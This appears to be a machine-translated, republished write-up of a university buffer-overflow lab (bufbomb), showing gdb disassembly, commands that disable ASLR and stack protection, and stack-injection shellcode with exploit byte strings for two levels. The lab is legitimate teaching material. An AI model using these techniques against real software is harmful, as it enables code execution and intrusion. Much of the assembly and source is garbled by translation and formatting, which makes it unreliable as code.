In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-06 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Level 2: firecracker (30 points)
There is a bang function in bufbomb
Int global_value = 0 void bang (int val) {if (global_value = = cookie) {printf ("Bangla: You set global_value to 0x%x\ n", global_value); validate (2);} else printf ("Misfire: global_value = 0x%x\ n", global_value); exit (0);}
Similar to the previous two hurdles, it is required to return to bang after calling getbuf and set the global variable global_value to its own cookie.
From this level, the executable shellcode needs to be arranged in the buf of the stack. After experiments, it is found that the stack area of Ubuntu 12.04.5 is unexecutable (May sombody tell me?). Because there is no way to close it, install Fedora 7 in the virtual machine, close the stack non-executable and randomize as follows, and continue the experiment.
Sysctl-w kernel.randomize_va_space=0
Sysctl-w kernel.exec-shield=0
Disassemble bang in gdb and get the address of 0x804aa60 and 0x804898c to store the global variable global_value.
[root@localhost buflab] # gdb-Q. / bufbombUsing host libthread_db library "/ lib/libthread_db.so.1". (gdb) disass bangDump of assembler code for function bang:0x0804898c: mov 0x804aa60% eax Assign global_value to% eax0x08048991: push% ebp0x08048992: mov% esp,%ebp0x08048994: sub $0x8 esp,%ebp0x08048994% esp0x08048997: cmp 0x804aa50% Eax Compare cookie with global_value0x0804899d: jne 0x80489c0 0x0804899f: add $0xfffffff8 force% esp0x080489a2: push% eax0x080489a3: push $0x80493e00x080489a8: call 0x8048748 0x080489ad: add $0xfffffffff4Power% esp0x080489b0: push $0x20x080489b2: call 0x8048c30 0x080489b7: add $0x20lice% esp0x080489ba: jmp 0x80489d1 0x080489bc: lea 0x0 (% esi),% esi0x080489c0: add $0xfffffffff8 mater% esp0x080489c3: push% eax0x080489c4: push $0x80494050x080489c9: call 0x8048748 0x080489ce: add $0x10case% esp0x080489d1: add $0xfffffff4philosophy% esp
Next, you need to set the global variable and jump to the shellcode in bang in buf, and set ret to buf
Get buf in debugging
(gdb) disass getbufDump of assembler code for function getbuf:0x08048a44: push% ebp0x08048a45: mov% esp,%ebp0x08048a47: sub $0x08048a4a: add $0xfffffff4J% esp0x08048a4d: lea 0xfffffff4 (% ebp),% eax; buf=%ebp-120x08048a50: push% eax0x08048a51: call 0x8048b50 0x08048a56: mov $0x1charge% eax0x08048a5b: mov% ebp,%esp0x08048a5d: pop% ebp0x08048a5e: ret End of assembler dump.
Set a breakpoint at the address 0x08048a50 and run it, and know that buf is 0xbfffb0bc
(gdb) b * 0x8048a50Breakpoint 1 at 0x8048a50 (gdb) run-t heenStarting program: / root/Desktop/buflab/bufbomb-t heenTeam: heenCookie: 0x5573b7cf (gdb) p $ebp+0xfffffff4 $2 = (void *) 0xbfffb0bc
Next, write shellcode.
[root@localhost buflab] # cat exploit3_shellcode.spushl $0x804898c; bang entry address movl $0x5573b7cf,% eax movl% eax, 0x804aa60 Set up cookieret [root@localhost buflab] # gcc-c exploit3_ shellcode.s [root @ localhost buflab] # objdump-d exploit3_shellcode.oexploit3_shellcode.o: file format elf32-i386Disassembly of section .text: 00000000: 0: 68 8c 89 04 08 push $0x804898c 5: B8 cf b7 73 55 mov $0x5573b7cf% eax a: A3 60 aa 04 08 mov% eax,0x804aa60 f: c3 ret
Finally, the hexadecimal machine code of shellcode is 16 bytes, which is just enough. So exploit string adds buf to shellcode.
[root@localhost buflab] # cat exploit3.txt68 8c 89 04 08 b8 cf b7 73 55 a3 60 aa 04 08 c3 bc b0 ff bf [root@localhost buflab] # cat exploit3.txt |. / sendstring |. / bufbomb-t heenTeam: heenCookie: 0x5573b7cfType stringcf: You set global_value to 0x5573b7cfNICE JOB!
Level 3: Dynamite (40 points)
This level requires getbuf to return to the test, but cannot break the stack state maintained for the test function (the test function adds stack state detection), and the return value after adding the call getbuf in the test function is its own cookie. The test function is as follows
Void test () {int val; volatile int local = 0xroombeef; val = getbuf (); / * Check for corrupted stack * / if (local! = 0xdeadbeef) {printf ("sabotagged: the stack has been corrupted\ n");} else if (val = = cookie) {printf ("booming: getbuf returned 0x%x\ n", val); validate (3) } else {printf ("Dud: getbuf returned 0x%x\ n", val);}}
This requires that our shellcode can not break the stack state of the getbuf calling function test, and we not only need to return to test, but also need to restore SFP, the stack base address of test, EBP. There are two ways to restore the stack base address: one is to set it in shellcode, and the other is to fill in SFP in the appropriate location in exploit string. Here we choose the second method.
Disassemble the test function to get the normal return address of the getbuf call.
(gdb) disass testDump of assembler code for function test:0x080489dc: push% ebp0x080489dd: mov% esp,%ebp0x080489df: sub $0x080489e2: movl $0x080489e2: movl $0xfffffffc (% ebp) 0x080489e9: call 0x8048a44 0x080489ee: mov% eax,%edx 0x080489ee is the getbuf return address: 0x080489f0: mov 0xfffffffc (% ebp),% eax0x080489f3: cmp $0x080489f8: je 0x8048a10 0x080489fa: add $0xfffffff4Power% esp0x080489fd: push $0x80494400x08048a02: call 0x8048748 0x08048a07: jmp 0x8048a40 0x08048a09: lea 0x0 (% esi),% esi0x08048a10: cmp 0x804aa50Med% edx0x048a16: jne 0x8048a32 0x08048a18: add $0xfffffff8% esp0x08048a1b: push% edx0x08048a1c: push $0x804946a0x08048a21: call 0x8048748 0x08048a26: add $0xfffffff4% esp0x08048a29: push $0x3---Type to continue Or q to quit
The value of the stack base address obtained from the breakpoint in 0x80489df is 0xbfffb0e8.
(gdb) b * 0x80489dfBreakpoint 2 at 0x80489df (gdb) run-t heenThe program being debugged has been started already.Start it from the beginning? (y or n) yStarting program: / root/Desktop/buflab/bufbomb-t heenTeam: heenCookie: 0x5573b7cfBreakpoint 2, 0x080489df in test () (gdb) p $ebp$3 = (void *) 0xbfffb0e8
Write shellcode to get its hexadecimal machine code
[root@localhost buflab] # cat exploit4_shellcode.smovl $0x5573b7cf file format elf32-i386Disassembly of section% eaxpush $0x80489eeret [root@localhost buflab] # gcc-c exploit4_ shellcode.s [root @ localhost buflab] # objdump-d exploit4_shellcode.oexploit4_shellcode.o: file format elf32-i386Disassembly of section .t ext:00000000: 0: b8 cf b7 73 55 mov $0x5573b7cfjue% Eax Set the return value of getbuf to cookie 5: 68 ee 89 04 08 push $0x80489ee; press the return address of getbuf to stack a: C3 ret
Combining the previous information, we get exploit string, where the byte ff can be any byte (except the carriage return 0a and the null character 00).
[root@localhost buflab] # cat exploit4.txt b8 cf b7 73 55 68 ee 89 04 08 c3 ff e8 b0 ff bf bc b0 ff bf [root@localhost buflab] # cat exploit4.txt |. / sendstring |. / bufbomb-t heenTeam: heenCookie: 0x5573b7cfType strings: getbuf returned 0x5573b7cfNICE JOB!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
